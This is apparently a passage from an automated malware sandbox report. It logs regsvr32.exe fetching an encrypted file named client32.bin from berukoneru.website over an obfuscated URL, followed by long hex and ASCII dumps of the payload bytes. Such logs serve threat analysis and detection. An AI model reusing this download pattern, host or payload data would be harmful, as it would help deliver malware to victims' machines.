27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                          Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                          2021-12-14 09:34:08 UTC1598INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                          Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                          2021-12-14 09:34:08 UTC1614INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                          Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                          2021-12-14 09:34:08 UTC1630INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                          Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                          2021-12-14 09:34:08 UTC1678INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                          Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                          2021-12-14 09:34:08 UTC1694INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                          Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          6192.168.2.54980179.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:07 UTC1101OUTGET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC1134INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 268426
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=brv6hst5is03pld8n10nk7l6i7; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:08 UTC1134INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                          Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                          2021-12-14 09:34:08 UTC1150INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                          Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                          2021-12-14 09:34:08 UTC1246INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                          Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                          2021-12-14 09:34:08 UTC1262INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                          Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                          2021-12-14 09:34:08 UTC1278INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                          Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                          2021-12-14 09:34:08 UTC1438INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                          Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                          2021-12-14 09:34:08 UTC1454INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                          Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                          2021-12-14 09:34:08 UTC1470INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                          Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                          2021-12-14 09:34:08 UTC1486INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                          Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                          2021-12-14 09:34:08 UTC1502INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                          Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                          2021-12-14 09:34:08 UTC1518INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                          Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                          2021-12-14 09:34:08 UTC1534INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                          Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                          2021-12-14 09:34:08 UTC1748INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                          Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                          2021-12-14 09:34:08 UTC1764INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 